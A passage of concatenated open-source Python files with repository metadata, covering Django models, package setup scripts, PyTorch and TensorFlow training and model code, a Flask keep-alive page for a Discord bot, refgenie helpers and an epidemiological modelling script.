Optional, if got a variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f"{self.allele} failed {self.liftover}: {self.error_message}"
1.671875
2
setup.py
KaiAnalytics/qualtrics_mailer
6
12796595
<filename>setup.py from setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ], zip_safe=False )
1.460938
1
models/__init__.py
respect5716/Tensorflow_Cifar10
0
12796596
<reponame>respect5716/Tensorflow_Cifar10<gh_stars>0 import tensorflow as tf from .vgg import * from .resnet import * from .resnext import * from .preact_resnet import * from .densenet import * from .dpn import * from .dla import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn': DPN32, 'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer, } model = model_dict[model_name](**kwargs) print(model.summary()) return model
2.078125
2
codewars/python/Inc_dec_test.py
James992927108/practice
0
12796597
<gh_stars>0 import sys sys.dont_write_bytecode = True import unittest import inc_dec class Test_TestIncrementDecrement(unittest.TestCase): def test_increment(self): self.assertEquals(inc_dec.increment(3), 4) def test_decrement(self): self.assertEquals(inc_dec.decrement(3), 2) if __name__ == '__main__': unittest.main()
2.65625
3
understanding_loop_control.py
brucestull/PythonLearning
2
12796598
# Second edit. # Added feature_01. # Create two nested 'for' loops. for x in range(1,5): print(f"Start of x:{x} loop.") for y in range(1,5): print(f"Start of y:{y} loop.") if y == 3: print(x, y, 'breaking') # print("Only 'break' out of inner 'y' loop.") break else: print(x, y, f"continuing. AKA end of y:{y} loop." ) # print("Will this start at beginning of 'y' loop?") continue # Code here not reacheable since following 'if' -> 'else'. print("Code here not reacheable since following 'if' -> 'else'.") print("Just finished all the 'y' loops.") print(f"Also, just finished x:{x} loop.") print("Just finished all the 'x' loops.")
4.125
4
setup.py
timniven/hsdbi
0
12796599
<reponame>timniven/hsdbi<gh_stars>0 from setuptools import setup, find_packages # python setup.py sdist upload -r pypi setup( name='hsdbi', packages=find_packages(exclude=['testing']), version='0.1a18', description='A simple interface for accessing databases.', author='<NAME>', author_email='<EMAIL>', url='https://github.com/timniven/hsdbi', download_url='https://github.com/timniven/hsdbi/archive/0.1a18.tar.gz', license='MIT', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries :: Python Modules', 'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT License', ], keywords='database interface facade', install_requires=[ 'pymongo', 'sqlalchemy' ] )
1.234375
1
fabfile/__init__.py
doutriaux1/ocgis
1
12796600
from fabric.decorators import task from fabric.operations import run, sudo, local from ConfigParser import ConfigParser import geospatial from fabric.context_managers import lcd cp = ConfigParser() cp.read('ocgis.cfg') if cp.get('install','location') == 'local': run = local cd = lcd def lsudo(op): local('sudo {0}'.format(op)) sudo = lsudo SRC = cp.get('install','src') INSTALL = cp.get('install','install') J = cp.get('install','j') @task(default=True) def deploy(): # geospatial.install_hdf() geospatial.install_netCDF4()
2
2
examples/simpleApp.py
tgolsson/appJar
666
12796601
<filename>examples/simpleApp.py # import the library from appJar import gui app = gui() # top slice - CREATE the GUI app.addLabel("title", "Welcome to appJar") # add a label app.setLabelBg("title", "red") # set the label's background to be red app.go() # bottom slice - START the GUI
3.015625
3
example/simple/lib.py
viniciusfeitosa/pychecko
5
12796602
<reponame>viniciusfeitosa/pychecko def bar(self): self.email = '<EMAIL>'
1.359375
1
trainGlobalIllumination.py
YouweiLyu/SingleImageShapeAndSVBRDF
60
12796603
import torch import numpy as np from torch.autograd import Variable import torch.optim as optim import argparse import random import os import models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print("Random Seed: ", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print("WARNING: You have a CUDA device, so you should probably run with --cuda") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j == 1 or j == 1000 or j% 2000 == 0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if (epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )
2.3125
2
examples/plot_read_raw_data.py
arokem/mne-python
0
12796604
""" ========================== Reading a raw file segment ========================== """ # Author: <NAME> <<EMAIL>> # # License: BSD (3-clause) print __doc__ import os from mne import fiff fname = os.environ['MNE_SAMPLE_DATASET_PATH'] fname += '/MEG/sample/sample_audvis_raw.fif' raw = fiff.setup_read_raw(fname) exclude = ['MEG 2443', 'EEG 053'] # bad channels meg_channels_idx = fiff.pick_types(raw['info'], meg=True, exclude=exclude) meg_channels_idx = meg_channels_idx[:5] # take 5 first start, stop = raw.time_to_index(100, 115) # 100 s to 115 s data segment data, times = raw[meg_channels_idx, start:stop] # data, times = raw[:, start:stop] # read all channels raw.close() ############################################################################### # Show MEG data import pylab as pl pl.close('all') pl.plot(times, data.T) pl.xlabel('time (s)') pl.ylabel('MEG data (T)') pl.show()
2.53125
3
openprocurement/auctions/geb/managers/changers/actions/cancellations.py
andrey484/openprocurement.auctions.geb
0
12796605
from openprocurement.auctions.core.utils import ( log_auction_status_change ) from openprocurement.auctions.geb.constants import ( AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION ) from openprocurement.auctions.geb.managers.changers.base import ( BaseAction ) class CancellationActivationAction(BaseAction): """ Cancellation Activation action when auction owner activate cancellation (patch status to 'active'): - auction.status will set to 'cancelled' - if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction'] delete all bids """ validators = [] @classmethod def demand(cls, request, context): """ Constructor method. If it is reason of action this method return instance of Action """ # check if patch is for activating cancellation new_status = request.validated['json_data'].get('status') if context.status == 'pending' and new_status == 'active': return cls return False def act(self): auction = self.request.auction # pendify auction status status = 'cancelled' auction.status = status log_auction_status_change(self.request, self.context, status) # clean bids after cancellation procedure auction_status = self.request.validated['auction_src']['status'] if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION: auction.bids = []
2.390625
2
tool_test/test_v_output4_8_get_map_zip_data.py
BerkeleyLibrary/geodata_pre_ingest
0
12796606
<reponame>BerkeleyLibrary/geodata_pre_ingest<filename>tool_test/test_v_output4_8_get_map_zip_data.py #!/usr/bin/python import os import sys import shutil sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from pre_ingestion import zip_data,geo_helper,par,validate_csv dirname = os.path.dirname(__file__).replace("test","test_data") def main(): try: geo_ext_list = _EXT = [".cpg", ".dbf", ".prj", ".sbn", ".sbx", ".shp", ".shx"] process_path = os.path.join(dirname,"vector_data","vector_output") valid_updated_csv = validate_csv.ValidateCSV(process_path) if valid_updated_csv.work_files_existed(): workspace_batch_path = geo_helper.GeoHelper.work_path(process_path) projected_map_path = geo_helper.GeoHelper.map_download_path(process_path) z_data = zip_data.ZipData(workspace_batch_path,projected_map_path,"map.zip",geo_ext_list) z_data.map_zipfiles() except Exception, e: txt = "Code exception: {0} ; {1}".format(__file__,str(e)) geo_helper.GeoHelper.arcgis_message(txt) if __name__ == '__main__': main()
2.140625
2
src/archan_pylint/__init__.py
Pawamoy/archan-pylint
1
12796607
import sys try: from archan import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import Run class LoggerWriter: def __init__(self, level): self.level = level def write(self, message): if message != '\n': self.level('from pylint: ' + message) class PylintProvider(Provider): """Pylint provider for Archan.""" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues per Module' description = 'Number of Pylint messages per module.' argument_list = ( Argument('pylint_args', list, 'Pylint arguments as a list.'), ) def get_data(self, pylint_args=None): """ Provide matrix data for Pylint messages in a set of packages. Args: pylint_args (list): the arguments to pass to Pylint. depth (int): the depth of the matrix to generate. Returns: archan.DSM: instance of archan DSM. """ logger = Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data = [] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: """Empty provider, please install Archan and Pylint."""
2.40625
2
example_snippets/multimenus_snippets/NewSnippets/SymPy/Functions/Combinatorial functions/Stirling number of the second kind.py
kuanpern/jupyterlab-snippets-multimenus
0
12796608
stirling(n, k)
0.96875
1
openapi_core/schema/contacts/models.py
eyadgaran/openapi-core
0
12796609
<gh_stars>0 """OpenAPI core contacts models module""" class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name = name self.url = url self.email = email self.extensions = extensions and dict(extensions) or {}
1.984375
2
codebasin/walkers/tree_walker.py
jasonsewall-intel/code-base-investigator
17
12796610
# Copyright (C) 2019 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections log = logging.getLogger('codebasin') class TreeWalker(): """ Generic tree walker class. """ def __init__(self, _tree, _node_associations): self.tree = _tree self._node_associations = _node_associations
2.21875
2
daiquiri/files/migrations/0002_depth.py
agy-why/daiquiri
14
12796611
# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'), ), ]
1.570313
2
webserver.py
Linerly/linerlybot-rewritten
3
12796612
<reponame>Linerly/linerlybot-rewritten from threading import Thread from flask import Flask app = Flask("") @app.route("/") def home(): return """ <!DOCTYPE="html"> <html> <head> <link rel="icon" href="https://linerly.github.io/assets/linerlybot/linerlybot.png" type="image/png"> <title>LinerlyBot Repl Page</title> </head> <body style="width: 80%; margin: auto;"> <style> figure message { top: 0; left: 0; position: absolute; } </style> <style> #message { margin: 0; padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size: 13px; } </style> <p id="message">You're in LinerlyBot's Replit site. <a href="https://linerly.github.io/linerlybot">Click here to go to LinerlyBot's main page!</a></p> <br> <img alt="LinerlyBot logo" src="https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png" style="display: block; margin-left: auto; margin-right: auto; border-radius: 50%;" width="128" height="128"> <h2 align="center">linerlybot-rewritten</h2> <p align="center"> <a href="https://discord.gg/a9Sy7gE"><img alt="Discord Server" src="https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat"></a> <a href="https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE"><img alt="License" src="https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat"></a> <a href="https://github.com/psf/black"><img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg?style=flat"></a> <a href="https://pycqa.github.io/isort/"><img alt="Imports: isort" src="https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336"></a> </p> <hr> <p>The new version of LinerlyBot with <a href="https://discordpy.readthedocs.io/en/stable">discord.py</a>.</p> <p><a href="https://discord.com/oauth2/authorize?client_id=529566778293223434&amp;permissions=2147485696&amp;scope=bot+applications.commands"><img src="https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge" alt="Invite LinerlyBot"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul> <hr> </body> </html> """ def run(): app.run(host="0.0.0.0", port=8080) def keep_alive(): t = Thread(target=run) t.start()
2.53125
3
fairscale/nn/moe/top2gate.py
vfdev-5/fairscale
6
12796613
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # # This source code is licensed under the BSD license found in the # LICENSE file in the root directory of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: """Implements Top2Gating on logits.""" gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts == 0 # Create a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float("-inf")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum("se,se->s", gates, mask1_float) gates2_s = torch.einsum("se,se->s", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum("s,se->se", gates1_s, mask1_float) gates2 = torch.einsum("s,se->se", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum("se,sc->sec", gates1, locations1_sc) combine2_sec = torch.einsum("se,sc->sec", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): """Gate module which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints): number of experts in model """ wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input) return top2gating(logits)
2.40625
2
refgenie/helpers.py
lmfaber-dkfz/refgenie
32
12796614
import errno import os from refgenconf import MissingRecipeError from ubiquerg import is_writable from .asset_build_packages import asset_build_packages from .exceptions import MissingFolderError def _parse_user_build_input(input): """ Parse user input specification. Used in build for specific parents and input parsing. :param Iterable[Iterable[str], ...] input: user command line input, formatted as follows: [[fasta=txt, test=txt], ...] :return dict: mapping of keys, which are input names and values """ lst = [] for i in input or []: lst.extend(i) return ( {x.split("=")[0]: x.split("=")[1] for x in lst if "=" in x} if lst is not None else lst ) def _single_folder_writeable(d): return os.access(d, os.W_OK) and os.access(d, os.X_OK) def _writeable(outdir, strict_exists=False): outdir = outdir or "." if os.path.exists(outdir): return _single_folder_writeable(outdir) elif strict_exists: raise MissingFolderError(outdir) return _writeable(os.path.dirname(outdir), strict_exists) def _raise_missing_recipe_error(recipe): """ Raise an error for a missing recipe, when one is requested :param str recipe: recipe name :raise MissingRecipeError: always """ raise MissingRecipeError( f"Recipe '{recipe}' not found. Available recipes: " f"{', '.join(list(asset_build_packages.keys()))}" ) def _skip_lock(skip_arg, cfg): """ If config read lock skip was not forced, check if dir is writable and set the default to the result :param bool skip_arg: argument selected on the CLI :param str cfg: path to the confjg :return bool: decision -- whether to skip the file lock for read """ return is_writable(os.path.dirname(cfg)) if not skip_arg else True def make_sure_path_exists(path): """ Creates all directories in a path if it does not exist. :param str path: Path to create. :raises Exception: if the path creation attempt hits an error with a code indicating a cause other than pre-existence. """ try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise
2.5
2
clarisse/var/lib/linux/menus/main_menu/file/open_recent_clear_recent.py
GuillaumeVFX/pipel
2
12796615
ix.application.clear_recent_files("project")
1.023438
1
example_project/example_project/urls.py
pwilczynskiclearcode/django-nuit
5
12796616
from django.conf.urls import patterns, include, url urlpatterns = patterns('', url(r'^', include('demo.urls')), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}), url(r'^logout/$', 'django.contrib.auth.views.logout'), )
1.734375
2
scripts/sensitivity_analysis/iceswe.py
gavento/epimod
26
12796617
""" :code:`iceswe.py` Holdout both iceland and sweden """ import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag, 